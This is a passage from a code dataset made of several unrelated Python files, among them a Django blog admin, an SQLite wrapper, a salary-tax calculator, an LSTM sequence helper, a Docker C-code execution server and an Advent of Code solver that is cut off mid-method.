str(self.x) + ';' + str(self.y) + ';' + str(self.z) + ';' + str(self.larg) + ';' + str(self.long) + ';' + str(self.haut) + ';\\n' )\n\n\ndef Creation_Cube(arene):\n \"\"\"Creation d'un cube de taille et coordonnees aleatoires\"\"\"\n x = random.randint(0,arene.lx)\n y = random.randint(0,arene.ly)\n z = random.randint(0,arene.lz)\n \n larg = random.randint(50,70)\n long = random.randint(50,70)\n haut = random.randint(50,70)\n \n return Cube(x, y, z, larg, long, haut)\n\n#constructeur temporaire necessaire a tkinter (affichage graphique)\ndef Creation_Cube_xy(x, y, arene):\n \"\"\"Creation d'un cube de taille aleatoire\"\"\"\n x = x\n y = y\n z = random.randint(0, arene.lz)\n\n larg = random.randint(30, 100)\n long = random.randint(30, 100)\n haut = random.randint(30, 100)\n\n return Cube(x, y, z, larg, long, haut)\n","sub_path":"simulation/basiques/cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"621144377","text":"#!/usr/bin/env python3\n\n#recording\nbob = {'name':'Bob Smith', 'age':'42','pay':'30000','job':'dev'}\nsue = dict(name='Sue Jones',age='45',pay='40000',job='hdw')\nnames = ['name','age','pay','job']\nvalues = ['Tom','50','0',None]\ntom = dict(zip(names,values))\n\n\ndb = {}\ndb['bob'] = bob\ndb['sue'] = sue\ndb['tom'] = tom\n\nif __name__ == '__main__':\n for key in db:\n print(key,'=>\\n',db[key])\n","sub_path":"initdata.py","file_name":"initdata.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"134037906","text":"class FindPayments(object):\n def __init__(self, Fetch, today):\n self.Fetch = Fetch\n self.today = today\n\n def get_payments(self, user_id):\n current_year, current_month = self.today.get_year(), self.today.get_month()\n current_payments = self.Fetch.fetch_by_month(user_id, current_year, \n current_month)\n \n previous_month = current_month - 1 if current_month != 1 else 12\n previous_month_year = current_year if current_month != 1 else current_year - 1\n \n past_payments = self.Fetch.fetch_by_month(user_id, previous_month_year, \n previous_month)\n \n return (current_payments, past_payments)\n\n ","sub_path":"app/unusual_spending/find_payments.py","file_name":"find_payments.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"349343316","text":"# -*- coding: utf-8 -*-\nimport re\nfrom html import *\n\nREGEX_LINE = re.compile('(((\\d{4})(\\d)(\\d{2})(\\d{4}))\\s(\\d+\\.\\d+\\.\\d+-\\d+))')\n\ntable = '''\n\n\n \n \n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n'''\n\n\ntransporte = open('txt/transporte.txt', 'r')\ntransporte_intermunicipal = open('txt/transporte-intermunicipal.txt', 'r')\nalimentacao = open('txt/alimentacao.txt', 'r')\nmoradia = open('txt/moradia.txt', 'r')\n\n# CPFS\nresultado = {}\n\n\ndef write(data=None, nome=None):\n for line in data:\n parsed = REGEX_LINE.findall(line)\n if len(parsed) > 0:\n # 0 all 1 mat 2 year 3 peri 4 curso 5 cod 6 cpf\n if resultado.get(parsed[0][1]):\n resultado[parsed[0][1]].update(\n {\n nome: \"Sim\",\n 'matricula': parsed[0][1],\n 'ano': parsed[0][2],\n 'periodo': parsed[0][3],\n 'curso': parsed[0][4],\n 'cpf': parsed[0][6],\n 'nome': 'Sem nome'\n }\n )\n else:\n resultado[parsed[0][1]] = {\n nome: \"Sim\",\n 'matricula': parsed[0][1],\n 'ano': parsed[0][2],\n 'periodo': parsed[0][3],\n 'curso': parsed[0][4],\n 'cpf': parsed[0][6],\n 'nome': 'Sem nome'\n }\n\nwrite(moradia, 'moradia')\nwrite(transporte, 'transporte')\nwrite(transporte_intermunicipal, 'transportei')\nwrite(alimentacao, 'alimentacao')\n\nfor a in resultado:\n aluno = resultado[a]\n table += dict_to_html(aluno)\n\n\nhtml_file = open('v2.html', 'w')\nhtml_file.write(table)\nhtml_file.write('''\n \n \n''')\n","sub_path":"v2.py","file_name":"v2.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"393734542","text":"from math import ceil, floor\nfrom typing import Tuple, List\n\nimport numpy as np\nimport pandas as pd\nfrom numpy import ndarray\nfrom pandas import DataFrame, Series\nfrom sklearn.model_selection import train_test_split\n\nTrainTestVectors = Tuple[ndarray, ndarray, ndarray, ndarray]\nTrainVectors = [TrainTestVectors, Tuple[ndarray, ndarray]]\n\n\nclass sequences:\n \"\"\"\n From a dataframe with four categories (OHLC) in a multivariate timeseries,\n aggrupate it in timesteps windows, split it in training and testing subsets,\n and finally, aggrupate X and y values together.\n\n Consider a given multi-variate sequence (num_categories = 3):\n\n [[ 10 15 25]\n [ 20 25 45]\n [ 30 35 65]\n [ 40 45 85]\n [ 50 55 105]\n ...\n ]\n\n We can divide the sequence into multiple input/output patterns called\n samples, where three time steps are used as input and one time step is\n used as output for the one-step prediction that is being learned.\n\n X, y_3\n --------------------\n [10, 15, 25\n 20, 25, 45\n 30, 35, 65] 85\n [20, 25, 45\n 30, 35, 65\n 40, 45, 85] 105\n ...\n\n In this example we consider timesteps=3, so X is composed of\n [ timesteps x num_categories ] samples, and y is the third column of\n the next sample.\n\n \"\"\"\n\n def __init__(self):\n pass\n\n @classmethod\n def to_time_windows(\n cls,\n df: DataFrame,\n train_columns: List[str],\n y_label: str,\n timesteps: int,\n test_size: float = 0.1\n ) -> TrainVectors:\n \"\"\"\n Prepare the input dataframe (OHLC) converting it into an ndarray\n of (num_samples x timesteps x num_categories), also splitting it\n into training and test sets.\n \"\"\"\n X_indices, y_index = cls._get_indices(df, train_columns, y_label)\n df = cls._aggrupate_in_timesteps(df.values, timesteps)\n if test_size != 0.0:\n train, test = train_test_split(\n df,\n test_size=test_size,\n shuffle=False)\n X_train, y_train = cls._split(train, X_indices, y_index, timesteps)\n X_test, y_test = cls._split(test, X_indices, y_index, timesteps)\n return X_train, y_train, X_test, y_test\n\n return cls._split(df.values, X_indices, y_index, timesteps)\n\n @classmethod\n def _aggrupate_in_timesteps(cls, data: ndarray,\n timesteps: int) -> DataFrame:\n \"\"\"\n Given a dataframe, divide the sequence into multiple input/output\n patterns called samples, where a number of time steps are used as\n input and one time step is used as output for the one-step prediction\n that is being learned.\n \"\"\"\n df = pd.DataFrame(data)\n series = df.copy(deep=True)\n series_s = series.copy(deep=True)\n for i in range(timesteps):\n series = pd.concat([series, series_s.shift(-(i + 1))], axis=1)\n series.dropna(axis=0, inplace=True)\n return series\n\n @classmethod\n def _get_indices(\n cls,\n df: DataFrame,\n train_columns: List[str],\n y_label: str) -> Tuple[List[int], int]:\n\n X_indices = [df.columns.get_loc(col_name) for col_name in train_columns]\n y_index = df.columns.get_loc(y_label)\n return X_indices, y_index\n\n @classmethod\n def _split(\n cls,\n data: ndarray,\n X_indices: List[int],\n y_index: int,\n timesteps: int) -> TrainVectors:\n \"\"\"\n Take num_samples from data, and separate X and y from it into two\n new tensors that will be used to feed the LSTM.\n \"\"\"\n num_samples = data.shape[0]\n num_categories = int(data.shape[1] / (timesteps + 1))\n subset = np.array(data).reshape(\n (num_samples, timesteps + 1, num_categories))\n\n X = subset[:, 0:timesteps, X_indices]\n y = subset[:, -1, y_index]\n\n if len(y.shape) == 1:\n y = y.reshape(-1, 1)\n return X, y\n\n @classmethod\n def get_num_features(cls, X_train):\n assert len(X_train.shape) == 3, \"Training set must be a 3D tensor\"\n return X_train.shape[2]\n\n @classmethod\n def get_num_target_labels(cls, y_train):\n assert len(y_train.shape) == 2, \"Training labels must be a 2D tensor\"\n return y_train.shape[1]\n\n @classmethod\n def _last_index_in_training(\n cls, df: DataFrame, timesteps: int, test_size: float = 0.1\n ) -> int:\n \"\"\"Returns the last value in the training set, from the original\n dataframe\"\"\"\n train_size = 1.0 - test_size\n n_samples = df.shape[0]\n n_test = ceil(test_size * n_samples)\n n_train = floor(train_size * n_samples)\n last_index_in_train = n_train - timesteps - 1\n return last_index_in_train\n\n @classmethod\n def last_in_training(\n cls, df: DataFrame, timesteps: int, test_size: float = 0.1\n ) -> Series:\n return df.iloc[\n cls._last_index_in_training(df, timesteps, test_size)]\n\n @classmethod\n def first_in_test(\n cls, df: DataFrame, timesteps: int, test_size: float = 0.1\n ) -> Series:\n return df.iloc[\n cls._last_index_in_training(df, timesteps, test_size) + 1\n ]\n\n @classmethod\n def previous_to_first_prediction(cls, df: DataFrame, timesteps: int\n ) -> Series:\n return df.iloc[timesteps - 1]\n","sub_path":"src/predictor/sequences.py","file_name":"sequences.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"218589233","text":"import random\n\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\n\nfrom back.forms import ArticlesForm, AddColumnForm, UpdateColumnForm\nfrom back.models import Articles, Column\nfrom user.models import User\n\n\ndef index(request):\n user = User.objects.get(pk=4)\n return render(request, 'back/index.html', {'user': user})\n\n\ndef articles(request):\n if request.method == 'GET':\n page = int(request.GET.get('page', 1))\n all_articles = Articles.objects.filter(is_delete=0)\n count = len(all_articles)\n articles = []\n for article in all_articles:\n column = Column.objects.get(id=article.a_column_id)\n name = column.column_name\n articles.append([article, name])\n pg = Paginator(articles, 8)\n articles = pg.page(page)\n return render(request, 'back/article.html', {'articles': articles, 'count': count})\n\n\ndef add_article(request):\n if request.method == 'GET':\n user = User.objects.get(pk=4)\n first_level = Column.objects.filter(pid_id=None)\n column_list = []\n for item in first_level:\n secone_level = Column.objects.filter(pid_id=item.id)\n data = [item, secone_level]\n column_list.append(data)\n return render(request, 'back/add_article.html', {'user': user, 'column_list': column_list})\n if request.method == 'POST':\n # 获取表单提交数据,并保存到数据库,跳转文章界面\n article = ArticlesForm(request.POST, request.FILES)\n if article.is_valid():\n title = article.cleaned_data['title']\n content = article.cleaned_data['content']\n keywords = article.cleaned_data['keywords']\n describe = article.cleaned_data['describe']\n tags = article.cleaned_data['tags']\n # image = article.cleaned_data['image']\n is_public = article.cleaned_data['is_public']\n a_column_id = int(article.cleaned_data['category'])\n image = str(random.randint(1, 14)) + '.jpg'\n Articles.objects.create(title=title,\n content=content,\n keywords=keywords,\n describe=describe,\n tags=tags,\n image=image,\n is_public=is_public,\n a_column_id=a_column_id)\n return HttpResponseRedirect(reverse('back:articles'))\n else:\n errors = article.errors\n return render(request, 'back/add_article.html', {'errors': errors})\n\n\ndef del_article(request, id):\n if request.method == 'GET':\n article = Articles.objects.filter(pk=id).first()\n article.is_delete = 1\n article.save()\n return HttpResponseRedirect(reverse('back:articles'))\n\n\ndef update_article(request, id):\n if request.method == 'GET':\n first_level = Column.objects.filter(pid_id=None)\n column_list = []\n for item in first_level:\n secone_level = Column.objects.filter(pid_id=item.id)\n data = [item, secone_level]\n column_list.append(data)\n article = Articles.objects.filter(pk=id).first()\n return render(request, 'back/update_article.html', {'article': article, 'column_list': column_list})\n if request.method == 'POST':\n # 获取表单提交修改后的数据,并保存到数据库,跳��文章界面\n article = ArticlesForm(request.POST, request.FILES)\n if article.is_valid():\n title = article.cleaned_data['title']\n content = article.cleaned_data['content']\n keywords = article.cleaned_data['keywords']\n describe = article.cleaned_data['describe']\n tags = article.cleaned_data['tags']\n # image = article.cleaned_data['image']\n image = str(random.randint(1, 14)) + '.jpg'\n is_public = article.cleaned_data['is_public']\n a_column_id = article.cleaned_data['category']\n # 更新文章数据\n Articles.objects.filter(pk=id).update(title=title,\n content=content,\n keywords=keywords,\n describe=describe,\n tags=tags,\n image=image,\n is_public=is_public,\n a_column_id=a_column_id)\n return HttpResponseRedirect(reverse('back:articles'))\n else:\n errors = article.errors\n return render(request, 'back/update_article.html', {'errors': errors})\n\n\ndef category(request):\n if request.method == 'GET':\n columns = Column.objects.all()\n column_count = len(columns)\n return render(request, 'back/category.html', {'columns': columns, 'column_count': column_count})\n if request.method == 'POST':\n # 获取表单提交修改后的数据,并保存到数据库,跳转栏目界面\n column = AddColumnForm(request.POST, request.FILES)\n if column.is_valid():\n column_name = column.cleaned_data['name']\n another_name = column.cleaned_data['alias']\n c_describe = column.cleaned_data['describe']\n c_keywords = column.cleaned_data['keywords']\n pid_id = column.cleaned_data.get('fid', None)\n # 更新文章数据\n Column.objects.create(column_name=column_name,\n another_name=another_name,\n c_describe=c_describe,\n c_keywords=c_keywords,\n pid_id=pid_id)\n return HttpResponseRedirect(reverse('back:category'))\n\n\ndef del_category(request, id):\n if request.method == 'GET':\n Column.objects.filter(pk=id).delete()\n return HttpResponseRedirect(reverse('back:category'))\n\n\ndef update_category(request, id):\n if request.method == 'GET':\n columns = Column.objects.all()\n del_column = Column.objects.get(pk=id)\n return render(request, 'back/update_category.html', {'columns': columns, 'del_column': del_column})\n if request.method == 'POST':\n # 获取表单提交修改后的数据,并保存到数据库,跳转文章界面\n column = UpdateColumnForm(request.POST, request.FILES)\n if column.is_valid():\n column_name = column.cleaned_data['name']\n another_name = column.cleaned_data['alias']\n c_describe = column.cleaned_data['describe']\n c_keywords = column.cleaned_data['keywords']\n pid_id = column.cleaned_data.get('fid', None)\n # 更新文章数据\n Column.objects.filter(pk=id).update(column_name=column_name,\n another_name=another_name,\n c_describe=c_describe,\n c_keywords=c_keywords,\n pid_id=pid_id)\n return HttpResponseRedirect(reverse('back:category'))\n else:\n errors = column.errors\n return render(request, 'back/update_article.html', {'errors': errors})\n","sub_path":"myblog/back/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"648774329","text":"# -*- coding: utf-8 -*-\r\n#__Author__= allisnone #2019-02-16\r\n#https://docs.python.org/3/library/sqlite3.html\r\n#https://www.sqlite.org/index.html\r\nimport sqlite3\r\nimport os\r\n\r\nclass Mysqlite():\r\n def __init__(self,db_path='',memory=False):\r\n self.connect = None\r\n self.cursor = None\r\n self.create_sqlite(db_path,memory)\r\n \r\n def create_sqlite(self, path='',memory=False):\r\n conn = None\r\n if not memory:\r\n self.connect = sqlite3.connect(path)\r\n else:\r\n self.connect = sqlite3.connect(':memory:')\r\n self.cursor = self.connect.cursor()\r\n \r\n def close(self):\r\n self.cursor.close()\r\n self.connect.close()\r\n \r\n def _join_str(self,fields, default='',specify=','):\r\n \"\"\"\r\n 把list或者tuple转化为str, 以逗号或者其他特殊字符连接\r\n \"\"\"\r\n re = default\r\n if fields:\r\n if isinstance(fields,str):\r\n re = fields\r\n elif isinstance(fields, list) or isinstance(fields, tuple):\r\n re = specify.join(fields)\r\n else:\r\n pass\r\n return re\r\n \r\n def create_table(self,table,columns=[]):\r\n \"\"\"\r\n 创建table:\r\n table: str, table name\r\n columns: table 列的列表或者tuple,保护sql的数据类型\r\n \"\"\"\r\n #con.execute(\"create table person (id integer primary key, firstname varchar unique)\")\r\n #cursor.execute(sql,{'st_name':name, 'st_username':username, 'id_num':id_num})\r\n #columns = ('id integer primary key', 'firstname varchar unique')\r\n sql = \"create table %s (%s);\" % (table,self._join_str(columns))\r\n try:\r\n self.cursor.execute(sql)\r\n self.connect.commit()\r\n except Exception as e:\r\n print('create_table Exception: ',e)\r\n return \r\n \r\n def get_table(self,table, fields='',where={'firsname':'b'}): \r\n \"\"\"\r\n 获取table的所有数据\r\n table: str\r\n fields: select 的列\r\n where: 过滤条件,只支持=\r\n \"\"\"\r\n sql = \"select %s from %s\" % (self._join_str(fields,'*'),table)\r\n a = ';'\r\n if where:\r\n a = ' where '+ ' '.join(['%s=\"%s\"'%(k,v) for k,v in where.items()]) + ';'\r\n try: \r\n print('sql=',sql+a)\r\n results = self.cursor.execute(sql+a)# 遍历打印输出\r\n datas = results.fetchall()\r\n return datas\r\n except Exception as e:\r\n print('get_table Exception: ',e)\r\n #self.cursor.close()\r\n return []\r\n \r\n def drop_table(self,table):\r\n sql = 'DROP TABLE IF EXISTS ' + table\r\n try:\r\n self.cursor.execute(sql)\r\n self.connect.commit()\r\n return 1\r\n except Exception as e:\r\n print('drop_table Exception: ',e)\r\n return 0\r\n \r\n def insert(self,table,datas):\r\n \"\"\"\r\n table: str, table name\r\n datas: list, each element will be tuple type\r\n \"\"\"\r\n if isinstance(datas,list) or isinstance(datas,tuple):\r\n pass\r\n else:\r\n return \r\n col_count = len(datas[0])\r\n col_str = ','.join(['?']*col_count)\r\n sql = 'INSERT INTO %s VALUES (%s)' % (table, col_str)\r\n try:\r\n self.cursor.executemany(sql,datas)\r\n self.connect.commit()\r\n return 1\r\n except Exception as e:\r\n print('insert Exception: ',e)\r\n #cursor.execute(sql,{'st_name':name, 'st_username':username, 'id_num':id_num})\r\n return 0\r\n \r\n def update(self,table,field,where=[], datas=[]):\r\n \"\"\"\r\n 更新特定字段\r\n table: str\r\n field: 更新的域\r\n where: 过滤条件\r\n datas: 更新的值和条件值组成的tuple, (更新的值,条件值1,条件值2,...),条件是与关系 \r\n \"\"\"\r\n where_str = self._join_str(where, default='',specify='=? ') + '=?;'\r\n update_sql = 'UPDATE %s SET %s=? ' % (table,field) + ' where ' + where_str\r\n #print('update_sql=',update_sql)\r\n try:\r\n self.cursor.executemany(update_sql,datas)\r\n self.connect.commit()\r\n return 1\r\n except Exception as e:\r\n print('update Exception: ',e)\r\n return 0\r\n \r\n def delete(self,table,where=[], datas=[]):\r\n \"\"\"\r\n 删除某行\r\n table: str\r\n where: 过滤条件,列名称组成的列表;where为空时,删除全部行\r\n datas: 条件值组成的tuple, (条件值1,条件值2,...),与关系\r\n \"\"\"\r\n #delete_sql = 'DELETE FROM student WHERE NAME = ? AND ID = ? '\r\n where_str = self._join_str(where, default='',specify='=? ') + '=?;'\r\n delete_sql = 'DELETE FROM %s' % table + ' where ' + where_str\r\n try:\r\n if not where:\r\n self.cursor.executemany(delete_sql,datas)\r\n else:\r\n self.cursor.executemany('DELETE FROM %s' % table)\r\n self.connect.commit()\r\n return 1\r\n except Exception as e:\r\n print('delete Exception: ',e)\r\n return 0\r\n \r\n def execute_script(self,sql):\r\n \"\"\"\r\n create table person(\r\n firstname,\r\n lastname,\r\n age\r\n );\r\n \r\n create table book(\r\n title,\r\n author,\r\n published\r\n );\r\n CREATE TABLE `student`(\r\n `id` int(11) NOT NULL,\r\n `name` varchar(20) NOT NULL,\r\n `gender` varchar(4) DEFAULT NULL,\r\n `age` int(11) DEFAULT NULL,\r\n `address` varchar(200) DEFAULT NULL,\r\n `phone` varchar(20) DEFAULT NULL,\r\n PRIMARY KEY (`id`)\r\n );\r\n insert into book(title, author, published)\r\n values (\r\n 'Dirk Gently''s Holistic Detective Agency',\r\n 'Douglas Adams',\r\n 1987\r\n );\r\n \"\"\"\r\n try:\r\n self.cursor.executescript(sql)\r\n self.connect.commit()\r\n return 1\r\n except Exception as e:\r\n print('execute_script Exception: ',e)\r\n return 0\r\n \r\n def backup(self,new='backup.db'):\r\n #sqlite3 >=3.7\r\n def progress(status, remaining, total):\r\n print('Copied {total-remaining} of {total} pages...')\r\n return\r\n with sqlite3.connect(new) as bck:\r\n self.connect.backup(bck, pages=1, progress=progress)\r\n return\r\n \r\nif __name__ == '__main__':\r\n sql3 = Mysqlite(db_path='test.db',memory=False)\r\n columns = ('id integer primary key', 'firstname varchar unique')\r\n sql3.create_table('table1', columns)\r\n datas1 = [(1,'a'),(2,'b'),(3,'c')]\r\n datas2 = [(1,'e'),(2,'f'),(3,'g')]\r\n sql3.insert('table1', datas1)\r\n table1_data = sql3.get_table(table='table1', fields='', where={'firstname':'b'})\r\n print('table1_data=',table1_data)\r\n sql3.insert('person', datas2)\r\n table2_data = sql3.get_table(table='person', fields='', where='')\r\n print('table2_data=',table2_data)\r\n sql3.update(table='table2',field='firstname',where=['id'], datas=[('h',2)])\r\n table2_data1 = sql3.get_table(table='table2', fields='', where='')\r\n print('table2_data1=',table2_data1)\r\n #sql3.drop_table('table1')\r\n #sql3.backup('new.db')\r\n sql3.close()","sub_path":"trademodel/mysqlite.py","file_name":"mysqlite.py","file_ext":"py","file_size_in_byte":7433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"359131108","text":"#!/usr/bin/env python3\n\nimport sys\n'''\n01.获取运行时,argv中的工资金额,并验证合法性,定义函数get_salary,返回salary_list字典\n02.根据工资金额,计算应纳税所得额(= 工资金额 - 各项社会保险费(1-0.165) - 起征点(3500元)),定义函数get_taxable_income\n03.计算应纳税额(= 应纳税所得额 × 税率 - 速算扣除数),get_income\n'''\n\ndef get_salary():\n strings = sys.argv[1:]\n salary_list = {}\n try:\n for string in strings:\n id = int(string.split(\":\")[0])\n salary = int(string.split(\":\")[1])\n salary_list[id] = salary\n except:\n raise Exception(\"Salary Input Error!!!\")\n return salary_list\n\ndef get_social(salary):\n # 养老保险:8% 医疗保险:2% 失业保险:0.5% 工伤保险:0% 生育保险:0% 公积金:6%\n social_rate = 0.08 + 0.02 + 0.005 + 0.06\n social_insurance = social_rate * salary # 各项社会保险费\n return social_insurance \n\ndef get_tax_rate(taxable_income):\n if taxable_income < 0:\n tax = 0\n deduction = 0\n elif taxable_income < 1500:\n tax = 0.03\n deduction = 0\n elif taxable_income < 4500:\n tax = 0.1\n deduction = 105\n elif taxable_income < 9000:\n tax = 0.2\n deduction = 555\n elif taxable_income < 35000:\n tax = 0.25\n deduction = 1005\n elif taxable_income < 55000:\n tax = 0.3\n deduction = 2755\n elif taxable_income < 80000:\n tax = 0.35\n deduction = 5505\n else:\n tax = 0.45\n deduction = 13505\n \n return tax,deduction\n\ndef get_income():\n threshold = 3500 # 起征点\n # 应纳税所得额\n\n salary_list = get_salary()\n for id,salary in salary_list.items():\n socail_pay = get_social(salary)\n taxable_income = salary - socail_pay - threshold\n tax_rate = get_tax_rate(taxable_income)[0]\n deduction = get_tax_rate(taxable_income)[1]\n tax = abs(taxable_income)*tax_rate - deduction\n income = salary - socail_pay - tax\n print(\"{}:{:.2f}\".format(id,income))\n\nif __name__ == '__main__':\n get_income()","sub_path":"week01/社保计算 - 函数/calculator-func.py","file_name":"calculator-func.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"230345989","text":"import numpy as np\nimport pylab as pl\n\ndata = np.loadtxt(\"correlation.dat\",delimiter=',',unpack=True)\nbars = np.loadtxt(\"corrstandev.dat\",delimiter=',',unpack=True)\nyrange = np.arange(0,len(data[0]),1)\n\ndim = len(data)\n\n#Setup 4 subplots in 4 a column\nfig,axs = pl.subplots(nrows=2,ncols=1,sharex=True)\n\nax = axs[0]\nax.errorbar(x=yrange, y=data[0], yerr = bars[0], fmt='.')\n\nfor i in range(1,dim):\n ax = axs[1]\n ax.errorbar(x=yrange, y=data[i], yerr = bars[i], fmt='')\n ax.axhline(y=0,color='k',)\n\npl.xlim([-0.5,len(data[0])-0.5])\nfig.suptitle('O('+str(dim)+') Correlators')\npl.show()\n\n\n","sub_path":"Sigma_Model/plotcorr.py","file_name":"plotcorr.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"255699306","text":"from executors.cexecutor import CExecutor\nimport socket\nimport signal\nimport socket\nfrom time import time, sleep\n\ndef alarm_handler(signum,frame):\n raise TimeoutError('Timeout!')\n\ndef make_block(msg):\n return msg + '\\0' * (4096-len(msg))\n\ndef main():\n #Set alarm to exit program\n max_time = 60\n signal.signal(signal.SIGALRM, alarm_handler)\n signal.alarm(int(max_time))\n\n try:\n #set up socket\n host = ''\n port = 4000\n serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n serversocket.bind((host, port))\n serversocket.listen(1) # become a server socket, maximum 1 connections\n msg = ''\n BLOCK_SIZE = 4096 #senc/recv message size\n\n #block until a connection is made\n connection, address = serversocket.accept()\n \n #reset alarm for 10 seconds\n signal.alarm(10)\n\n #get compiler flags and code, remove any null bytes from packing\n for i in range(0,2):\n msg += connection.recv(BLOCK_SIZE).decode(\"utf-8\").replace('\\0','')\n \n ind = msg.index('\\n')\n\n with open(\"flags.txt\",\"w\") as f:\n f.write(msg[:ind])\n\n with open(\"code.c\",\"w\") as f:\n f.write(msg[ind:])\n\n codex = CExecutor()\n codex.execute()\n connection.send(bytes(codex.log,\"utf-8\"))\n except TimeoutError:\n serversocket.close()\n raise SystemExit\n except OSError as ose:\n print(ose)\n finally:\n serversocket.close()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"spikes/Docker/current/docker-builds/starters/start_c.py","file_name":"start_c.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"561497418","text":"import wx\nimport wx.lib.agw.aui as aui\nfrom include.utils import dict2\nclass Page(object):\n\tdef __init__(self, parent, mgr, refs):\n\t\tself.parent=parent\n\t\tself.mgr=mgr\n\t\tself.refs= refs\n\n\tdef detachWin(self, winkey, winname):\n\t\tmgr=self.mgr\n\t\tref= self.refs[winkey][winname]\n\t\tpane= mgr.GetPane(ref)\n\t\t\n\t\tif pane.IsOk():\n\t\t\tpane.Show(False)\n\t\t\tmgr.DetachPane(ref)\n\n\t\tif 1: \n\t\t\tref.Show(False)\n\n\tdef attachWin(self,win, winkey,winname):\n\t\t\n\t\tif winkey not in self.refs: self.refs[winkey] = {}\n\t\t\n\t\tif 1:\n\t\t\tif winname not in self.refs[winkey] :\n\t\t\t\tself.refs[winkey][winname] = win\n\t\t\telse: \n\t\t\t\twin = self.refs[winkey][winname]\n\t\t\t\twin.Show(True)\n\t\t\t\n\tdef load_page(self):\n\t\t\n\t\t#\n\t\t#Logger | tools\\LogCtrl.py.LogCtrl\t\n\t\t#\n\t\tfrom tools.LogCtrl import runTest\n\t\t\t\n\t\twinname\t= 'Logger'\n\t\twinkey\t= r'tools\\LogCtrl.py.LogCtrl'\n\t\twin = parent=runTest(parent=self.parent, name=winname, lineno=0, layout_fn ='Lib\\Isle\\Rack\\MVC\\_layout\\Logger.json' , pref = dict2(lid = '0',iid = '0',rid = '0',sid = '0',bid = '1586023493',cid = '1584136252',pid = '1586014312') )\n\t\tself.attachWin(win, winkey,winname)\n\t\t\n\t\tself.mgr.AddPane(win,aui.AuiPaneInfo().Center().Layer(1).\n\t\tBestSize(wx.Size(-1,-1)).MinSize(wx.Size(-1,-1)).CaptionVisible(True).Caption(\"Logger\").\n\t\tCloseButton(False).Name(\"Logger\"))","sub_path":"_build/Lib-Isle-Rack-MVC-_layout-Logger.py","file_name":"Lib-Isle-Rack-MVC-_layout-Logger.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"457073914","text":"import copy\nimport re\n\n\nclass Day16:\n\n # started 0:02 after\n def __init__(self, data):\n self.raw_data = data\n self.ticket_types = {}\n self.your_ticket = \"\"\n self.nearby_tickets = []\n self.valid_tickets = []\n\n self.valid_chart = {}\n self.load_data()\n\n def solve_part1(self):\n # print(self.ticket_types)\n # print(self.your_ticket)\n # print(self.nearby_tickets)\n\n invalid_sum = 0\n for t in self.nearby_tickets:\n for n in t:\n if not self.valid_number(n):\n invalid_sum += n\n\n print(f\"Scanning Error Rate: {invalid_sum}\")\n\n def valid_number(self, num):\n for _, ticket_type_ranges in self.ticket_types.items():\n for r in ticket_type_ranges:\n if num >= r[0] and num <= r[1]:\n return True\n return False\n\n def solve_part2(self):\n for t in self.ticket_types.keys():\n self.valid_chart[t] = [1] * len(self.your_ticket)\n\n for t in self.nearby_tickets:\n valid = True\n for n in t:\n if not self.valid_number(n):\n valid = False\n if valid:\n self.valid_tickets.append(t)\n\n print(\n f\"Nearby Tickets: {len(self.nearby_tickets)}, Valid: {len(self.valid_tickets)}\"\n )\n\n # Also append our ticket:\n self.valid_tickets.append(self.your_ticket)\n\n for t in self.valid_tickets:\n for col, n in enumerate(t):\n mapping = self.valid_for(n)\n\n for tt, valid in mapping.items():\n if valid == 0:\n self.valid_chart[tt][col] = 0\n print(f\"Ticket {t} column {col}={n} Mapping: {mapping}\")\n\n print(f\"Valid chart: {self.valid_chart}\")\n\n col_to_type_mapping = {}\n current_chart = copy.deepcopy(self.valid_chart)\n\n while len(current_chart) > 0:\n # print(f\"Current chart: {current_chart}\")\n next_type, next_col = self.find_next_unique_match(current_chart)\n col_to_type_mapping[next_type] = next_col\n # Clear chart of used column:\n for _, mapping in current_chart.items():\n mapping[next_col] = 0\n\n print(f\"{next_type} => {next_col}\")\n del current_chart[next_type]\n\n print(f\"Mapping: {col_to_type_mapping}\")\n values = 1\n for tt, col in col_to_type_mapping.items():\n if tt.startswith(\"departure\"):\n your_ticket_value = self.your_ticket[col]\n print(\n f\"{tt} = {col}, {your_ticket_value} x {values} = {values * your_ticket_value}\"\n )\n values *= your_ticket_value\n\n print(f\"Departure multiplicated: {values}\")\n\n def find_next_unique_match(self, chart):\n for tt, mapping in chart.items():\n if sum(mapping) == 1:\n col = mapping.index(1)\n return tt, col\n print(f\"COULD NOT FIND UNIQUE MATCH! Chart: {chart}\")\n\n # def merge_mapping(self, m1, m2):\n # merged = {}\n # for k in m1:\n # merged[k] = m1[k] * m2[k]\n\n def valid_for(self, num):\n mapping = self.make_mapping()\n for tt, ticket_type_ranges in self.ticket_types.items():\n valid = False\n for r in ticket_type_ranges:\n if num >= r[0] and num <= r[1]:\n valid = True\n if not valid:\n mapping[tt] = 0\n return mapping\n\n def make_mapping(self):\n mapping = 